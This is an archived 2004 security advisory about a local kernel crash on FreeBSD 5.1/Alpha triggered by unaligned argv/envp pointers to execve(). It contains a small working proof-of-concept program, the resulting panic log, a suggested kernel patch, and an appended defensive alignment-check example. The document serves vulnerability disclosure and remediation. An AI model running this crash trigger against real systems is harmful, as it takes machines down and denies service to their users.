freebsd.local.txt

Date: 25 Jun 2004. Reported by: Marceta Milos. Type: packetstorm. Source: packetstormsecurity.com

FreeBSD local denial of service: the execve() syscall on FreeBSD/Alpha panics the kernel when it is handed an unaligned memory address as its argv or envp argument.

Code

Security Advisory : FreeBSD local DoS
  
Systems affected:  
  
FreeBSD 5.1-RELEASE/Alpha. Other versions are probably vulnerable.  
FreeBSD 5.1-RELEASE/IA32 is _not_ vulnerable.  
  
Not sure about other FreeBSD/arch but they could be vulnerable too.  
  
Risk: low  
  
Date: 23 June 2004  
  
Legal notice:  
  
1. This Advisory is Copyright (c) 2004 Marceta Milos.  
2. You may distribute it unmodified.   
3. You may not modify it and distribute it or distribute  
parts of it without the author's permission.  
4. This document stays open for revision. Anything may  
change without notice. For a possible update you may  
visit author's homepage which should be redesigned soon.  
  
  
Disclaimer:  
  
I am not responsible for any damage caused by use  
of the information provided in this document.  
  
  
Description:

It is possible to crash the kernel on FreeBSD/Alpha by passing an unaligned
memory address as the 2nd or 3rd argument (argv or envp) of the execve() syscall.


Condition:

To crash the system, the first argument of execve() must point to an accessible filename.
  
  
Demonstration code:  
  
# cat kernkill.c

```c
/*
 * FreeBSD/Alpha local DoS
 * by Marceta Milos
 * [email protected]
 *
 */

#include <stdint.h>
#include <unistd.h>

/* Pass a deliberately unaligned address (one byte past the start of main)
 * as argv; on FreeBSD 5.1-RELEASE/Alpha the kernel takes an unaligned
 * access fault while reading the argument vector and panics. */
int main(void)
{
    execve("/bin/ls", (char *const *)((uintptr_t)main + 1), (char *const *)0);
    return 0;
}

/* eof */
```
  
```
# gcc kernkill.c -okk
# ./kk

fatal kernel trap:

trap entry = 0x4 (unaligned access fault)
cpuid = 0
faulting va = 0x120000891
opcode = 0x29
register = 0x0
pc = 0xfffffc0000651bf0
ra = 0xfffffc00004900e0
sp = 0xfffffe0039c3f840
usp = 0x11fffae0
curthread = 0xfffffc00620a3720

pid = 713, comm = kk

panic: trap
cpuid = 0;

syncing disks, buffers remaining... 234 234 232 232 232 232 231 232 231 231 231
231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231
giving up on 141 buffers
Uptime: 13m13s
Automatic reboot in 15 seconds - press a key on the console to abort
Rebooting...
```
  
  
Workaround:

You may make proper use of the ALIGNED_POINTER macro that already exists in
src/sys/alpha/include/param.h to check whether the pointers are aligned, or make your
own like the following (the pointer must be cast to an integer type before the mask is applied):

```c
#define PTR_ALIGNED(x) ((((uintptr_t)(x)) & 0x7) == 0)
```

Putting the following lines at the top of execve() in src/sys/kern/kern_exec.c
should prevent the crash (unfortunately, this is not tested. The idea is mine, slightly
corrected by Mr. Dag-Erling Smørgrav, FreeBSD deputy security officer):

```c
if (!PTR_ALIGNED(uap->argv) || !PTR_ALIGNED(uap->envv))
	return (EFAULT);
```
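The following is an added example, not code from the advisory or from the FreeBSD source tree, showing the shape of the guard the workaround describes in user-space C so it can be compiled and exercised anywhere. It generalises the advisory's fixed 8-byte mask into a macro parameterised on the object type, and wraps the check in a hypothetical `check_exec_ptr_args()` that refuses a misaligned argv/envp with EFAULT before anything is dereferenced; `count_ptr_array()` and the sample argument vector are constructed for the demonstration.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Generic form of the advisory's PTR_ALIGNED macro: a pointer is usable for
 * an object of type `t` when its address is a multiple of sizeof(t). On a
 * strict-alignment CPU such as Alpha, dereferencing it otherwise faults. */
#define PTR_ALIGNED_FOR(p, t) ((((uintptr_t)(p)) & (sizeof(t) - 1)) == 0)

/* Hypothetical pre-check for the execve() pointer-array arguments, modelled
 * on the advisory's suggested guard: each of argv and envp must be either
 * NULL or aligned for a `char *`, otherwise the call is refused with EFAULT
 * instead of the kernel touching the address. */
int check_exec_ptr_args(const void *argv, const void *envp)
{
    if (argv != NULL && !PTR_ALIGNED_FOR(argv, char *))
        return EFAULT;
    if (envp != NULL && !PTR_ALIGNED_FOR(envp, char *))
        return EFAULT;
    return 0;
}

/* Count the entries of a NULL-terminated pointer array, but only after the
 * alignment check passes. Returns -1 and sets *err to EFAULT when the base
 * pointer could not have been read safely; the array is never touched then. */
int count_ptr_array(char *const *base, int *err)
{
    int n = 0;

    *err = check_exec_ptr_args(base, NULL);
    if (*err != 0)
        return -1;
    while (base[n] != NULL)
        n++;
    return n;
}

int main(void)
{
    /* Constructed sample argument vector, properly aligned by the compiler. */
    char *const args[] = { "/bin/ls", "-l", NULL };
    int err;

    printf("aligned argv: %d entries, err=%d\n",
           count_ptr_array(args, &err), err);

    /* One byte into the same array: misaligned for a pointer, so the guard
     * rejects it with EFAULT rather than performing an unaligned load. */
    char *const *bad = (char *const *)((uintptr_t)args + 1);
    printf("misaligned argv: %d entries, err=%d (EFAULT=%d)\n",
           count_ptr_array(bad, &err), err, EFAULT);
    return 0;
}
```

The `sizeof(t) - 1` mask only works because every natural alignment is a power of two; the advisory's `& 0x7` is the instance of this for 8-byte pointers on Alpha. Note that alignment is only the cheap first check: the real syscall still has to copy the vector in with `copyin()`-style accessors that survive an unmapped page.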
  
  
Vendor status: FreeBSD was notified on Sat 19/06/2004 23:50 -0000  
  
Greets to: LSD, teso, phenoelit, synnergy, thc, netric, scut, silvio, stinger && eSDee.  
  
  